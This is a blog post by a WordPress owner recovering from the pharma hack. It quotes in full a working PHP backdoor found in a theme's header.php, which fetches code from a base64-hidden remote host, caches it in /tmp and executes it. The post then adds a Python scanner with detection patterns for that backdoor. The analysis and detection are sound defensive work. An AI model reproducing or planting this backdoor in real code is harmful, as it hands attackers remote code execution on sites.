Getting busy on the blog for the wrong reasons

I’ve been spending lots of time on this blog but not for good reasons. I’m currently under attack by the nasty pharma hack and I can’t get things to work. I still haven’t identified the backdoor used to enter my WordPress installation. I’ve done all the necessary steps: cleaned the database, removed the offending files, removed the first source of entry, upgraded WP and all plugins + themes I use. I changed the FTP password and database passwords for all three sites I manage on this hosting platform. I did this three times already. Still, every day I get a notification from WP File Monitor that the SOB has modified some files. If anybody has pointers useful for identifying the entry point for this cracker, please let me know.

UPDATE: I think I found the backdoor that the bastard is using. It was in the header.php of one of the templates:

```php
<?php /* system_remote_fopen procedure */
$er = error_reporting(0); // silence every warning so the backdoor fails quietly

// Build an HTTP fetch helper at runtime; it works whether curl, raw sockets
// or allow_url_fopen is available, so it survives most hosting configurations.
$f_sys_remote_fopen = create_function('$uri', '
    $_url = @parse_url($uri);
    if (!$_url || !is_array($_url)) return false;
    if (!isset($_url["scheme"]) || !in_array($_url["scheme"], array("http", "https"))) $uri = "http://".$uri;
    if (function_exists("curl_init")) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $uri);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        $txt = curl_exec($ch);
        curl_close($ch);
        return $txt;
    } elseif (function_exists("fsockopen")) {
        $f = @fsockopen($_url["host"], 80, $errno, $errstr, 5);
        @stream_set_timeout($f, 10);
        if ($f) {
            $s = "GET $uri HTTP/1.0\r\nHost: ".$_url["host"]."\r\nConnection: Close\r\n\r\n";
            @fwrite($f, $s);
            $txt = "";
            while (!feof($f)) $txt .= @fgets($f, 128);
            $txt = trim($txt);
        }
        @fclose($f);
        return substr($txt, strpos($txt, "\r\n\r\n") + 4); // strip the HTTP headers
    } elseif (@ini_get("allow_url_fopen")) {
        @ini_set("default_socket_timeout", 10);
        $fp = @fopen($uri, "r");
        if (!$fp) return false;
        $txt = "";
        while ($ln = @fread($fp, 4096)) $txt .= $ln;
        @fclose($fp);
        return $txt;
    } else return "";
');

$sys_remote_fopen = 'aHR0cDovL2luY29tZWluLm5ldC8='; // base64 of the remote URL the payload is fetched from
$opt_id = '4f66ac83efc3ebdc05a18f757f30f875';         // identifier for this infected site

// The cached payload lives in /tmp under a name that mimics a PHP session file.
$sess = @file_get_contents('/tmp/sess_'.md5($opt_id));

// Ask the remote server for the current payload hash; re-download only when it changed.
$_sess = @trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.'.md5'));
if ($_sess != "" && $_sess != md5($sess)) {
    $sess = @trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.'.txt'));
    $fh = @fopen("/tmp/sess_".md5($opt_id), "w+");
    @fwrite($fh, $sess);
    @fclose($fh);
}

// The payload is base64 + serialize()d PHP; the 'uptime' field holds code that is
// compiled with create_function() and run with the whole payload passed by reference.
$sess = @unserialize(@base64_decode($sess));
if ($sess && $sess['uptime'] != "") {
    unset($sess_f);
    $sess_f = create_function("$a", $sess['uptime']);
    $sess_f(&$sess);
}
error_reporting($er);
/* system_remote_fopen procedure */ ?>
```
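The snippet above has a recognisable shape: errors are silenced, an HTTP fetcher is assembled with `create_function`, the command URL is hidden behind `base64_decode`, the payload is cached under `/tmp/sess_` and finally `unserialize`d and executed. A small scanner that looks for that combination across a theme or plugin tree is a practical way to catch a re-infection the day it happens instead of waiting for the file-monitor e-mail. The script below is an added example and is not part of the original post or of WordPress; the indicator list, weights and the `6` threshold are my own choices, and the two sample files it checks are constructed inline (the URL placeholder is `http://example.invalid/`, not the one in the real backdoor).

```python
"""Score PHP sources for the remote-fetch-and-eval backdoor pattern shown above."""
import base64
import re
import sys
from pathlib import Path
from typing import Dict, List, Tuple

# (name, regex, weight): each indicator comes from the backdoor's own structure.
# Weights are an assumption for this example; tune them for your own tree.
INDICATORS: List[Tuple[str, re.Pattern, int]] = [
    ("error_reporting_off", re.compile(r"error_reporting\s*\(\s*0\s*\)"), 1),
    ("create_function", re.compile(r"\bcreate_function\s*\("), 2),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\("), 2),
    ("unserialize", re.compile(r"\bunserialize\s*\("), 1),
    ("tmp_session_file", re.compile(r"/tmp/sess_"), 3),
    ("remote_fetch", re.compile(r"\b(curl_init|fsockopen|file_get_contents)\s*\("), 1),
]
SUSPICIOUS_THRESHOLD = 6  # assumption: enough to need at least two strong indicators

# A quoted base64 literal of non-trivial length, e.g. '$sys_remote_fopen' above.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def decoded_urls(php_source: str) -> List[str]:
    """Return every quoted base64 literal that decodes to an http(s) URL."""
    found = []
    for match in B64_LITERAL.finditer(php_source):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or not text: an md5 hex string lands here
        if text.startswith(("http://", "https://")):
            found.append(text)
    return found


def score_php(php_source: str) -> Dict[str, object]:
    """Score one PHP source; hidden URLs weigh heavily because the backdoor needs one."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(php_source)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    urls = decoded_urls(php_source)
    score += 3 * len(urls)
    return {
        "score": score,
        "hits": hits,
        "decoded_urls": urls,
        "suspicious": score >= SUSPICIOUS_THRESHOLD,
    }


def scan_tree(root: Path) -> List[Tuple[Path, Dict[str, object]]]:
    """Walk a wp-content tree and return the PHP files that score as suspicious."""
    flagged = []
    for path in sorted(root.rglob("*.php")):
        result = score_php(path.read_text(errors="replace"))
        if result["suspicious"]:
            flagged.append((path, result))
    return flagged


# Constructed samples (not real files): a sanitised imitation of the backdoor's
# skeleton with a placeholder URL, and an ordinary header.php fragment.
SAMPLE_URL_B64 = base64.b64encode(b"http://example.invalid/").decode("ascii")
SAMPLE_BACKDOOR = (
    "<?php $er=error_reporting(0); "
    "$f=create_function('$uri','return @file_get_contents($uri);'); "
    "$u='" + SAMPLE_URL_B64 + "'; $id='0123456789abcdef0123456789abcdef'; "
    "$sess=@file_get_contents('/tmp/sess_'.md5($id)); "
    "$sess=@unserialize(@base64_decode($sess)); error_reporting($er); ?>"
)
SAMPLE_BENIGN = "<?php get_header(); wp_head(); ?><body <?php body_class(); ?>>"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, result in scan_tree(Path(sys.argv[1])):
            print(f"{path}: score={result['score']} hits={result['hits']} "
                  f"urls={result['decoded_urls']}")
    else:
        print("backdoor sample:", score_php(SAMPLE_BACKDOOR))
        print("benign sample:  ", score_php(SAMPLE_BENIGN))
```

Run it as `python scan_backdoor.py /path/to/wp-content` from cron and diff the output against the previous run; with no argument it scores the two embedded samples. The decoded URLs double as indicators worth blocking at the outbound firewall, which also stops the backdoor from refreshing its payload even if a copy is missed.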

Let’s see how long this lasts.

  1. Well, I think I finally fixed it. I’ve done most of the security related modifications to my WP install in the past, but the hack continued to find its way in. Finally I renamed the database tables and password protected the wp-admin directory, and that is what’s put an end to the problem for me.